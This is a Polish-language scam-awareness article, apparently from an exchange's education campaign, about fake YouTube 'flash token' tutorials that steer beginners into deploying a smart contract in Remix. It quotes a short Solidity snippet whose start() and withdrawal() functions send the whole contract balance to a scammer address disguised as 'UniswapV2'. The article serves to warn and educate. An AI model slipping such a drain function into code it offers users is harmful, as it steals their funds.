Uważaj na fałszywe tutoriale na YouTubie. Możesz stracić pieniądze!

Interesujesz się programowaniem i chcesz wejść w świat blockchaina? A może masz w planie wdrożyć się w smart kontrakty i szukasz na YouTubie poradników, jak to zrobić? Uważaj, pozornie nieszkodliwe materiały mogą być sprytnie uknutym oszustwem. Dowiedz się, czym są flash tokeny i jak ochronić się przed oszustwem.

Oszuści mają wiele sposobów, by osiągać swoje niecne cele. O tych metodach ostrzega m.in. Kanga w swojej edukacyjnej kampanii. Wciąż jednak pojawiają się nowe.

Tutoriale na YouTubie przyciągają osoby, które chcą nauczyć się czegoś nowego… I, jak się okazuje, oszustów. Publikują filmy, którym na pierwszy rzut oka nic nie można zarzucić. Podają się za ekspertów od smart kontraktów i krok po kroku pokazują, jak stworzyć flash token, czyli token jednorazowy.

Flash tokeny i scam na poradnik wideo

Taki flash token wykorzystuje się w jednej, złożonej transakcji na blockchainie. Istnieje tylko przez chwilę – jest tworzony, używany i niszczony w ramach tej samej operacji. Jeśli cała transakcja się nie powiedzie (np. środki nie zostaną zwrócone), blockchain automatycznie ją anuluje, tak jakby nigdy się nie wydarzyła. 

Flash tokeny są wykorzystywane głównie w finansach zdecentralizowanych (DeFi) do szybkich działań, takich jak zarządzanie płynnością, bez potrzeby posiadania dużych środków na stałe.

Po co tworzyć flash tokeny? 

Za pomocą flash tokenów można zarabiać, kupując je taniej i w innym miejscu sprzedając drożej. Umiejętność taka przydaje się także zawodowo, bo firmy związane z blockchainem poszukują programistów z taką wiedzą.

Dlatego coraz więcej osób chce nauczyć się je tworzyć. Szukają więc poradników w sieci… I trafiają na film oszustów.

Instrukcja brzmi jasno i zrozumiale. Omawia ją ktoś, kto podaje się za eksperta.

W pewnym momencie „instruktor” radzi, abyś zasilił swój portfel kryptowalutowy, skopiował kod z podanej przez niego strony i wkleił go do Remix Ethereum IDE. Następnie zachęca do wdrożenia smart kontraktu na blockchain i uruchomienia funkcji wypłaty. Ma ona rzekomo generować środki w portfelu. Wszystko oczywiście klarownie wyjaśnia.

Wydaje się to proste i nie wzbudza podejrzeń. Do czasu.

Kod, który kradnie

Problem pojawia się w momencie, gdy podany kod zaczyna działać.

Na pierwszy rzut oka wygląda on niewinnie, ale tak nie jest. Scamerzy sprytnie go zmodyfikowali, tak, aby automatycznie po uruchomieniu wysyłał twoje środki wprost do nich – na ich portfel. 

Oto przykład fałszywego kodu:

address UniswapV2 = 0x40d4AeC2145a1EeB[…]ea5BC337c386BB;

function start() public payable {
payable((UniswapV2)).transfer(address(this).balance);
}
function withdrawal() public payable {
payable((UniswapV2)).transfer(address(this).balance);
}

Jak działa fałszywy flash token?

Gdy uruchamiasz funkcję, kod natychmiast przesyła całą wartość kontraktu na portfel oszustów. Środki przepływają przez sieć adresów, a na końcu trafiają na giełdy lub do kasyn online. W ten sposób oszuści zacierają ślady i utrudniają wyśledzenie wykradzionych środków – a więc prawdopodobnie je piorą. Na jednym z portfeli zgromadzili ponad 2 mln. dol.! 

Podobnych filmów pojawia się na YouTubie coraz więcej. Przestępcy celują w osoby, które dopiero zaczynają uczyć się programowania. Liczą na to, że nie rozpoznają zagrożenia. Aby dodatkowo uśpić czujność odbiorców, scamerzy wstawiają pod filmami pozytywne komentarze, które mają potwierdzać działanie poradnika. Wszystkie pochodzą z fałszywych kont.

Dlatego pamiętaj: zawsze sprawdzaj, kto jest autorem tutoriala i nie kopiuj kodu z niepewnych źródeł. Przeanalizuj każdy fragment kodu lub poproś o pomoc eksperta. I nigdy nie wierz w obietnice szybkich zysków. Jeśli coś wydaje się zbyt piękne, żeby było prawdziwe, zapewne takie właśnie jest.

Nie daj się oszukać!

Oszuści stale wymyślają nowe sposoby, by wyłudzić twoje pieniądze. Filmy, które do złudzenia przypominają zwyczajne poradniki, są tylko jednym z przykładów. Zawsze weryfikuj źródła i podchodź z rezerwą do informacji znalezionych w sieci. Twoje bezpieczeństwo zależy od twojej czujności. A jeśli trafisz na podejrzane nagranie – zgłoś je do YouTube’a.

Chcesz być na bieżąco z zagrożeniami w świecie kryptowalut i wiedzieć, jak się przed nimi chronić? Bądź o krok przed scamerami – śledź kampanię Kanga Nie Pie(p)rz.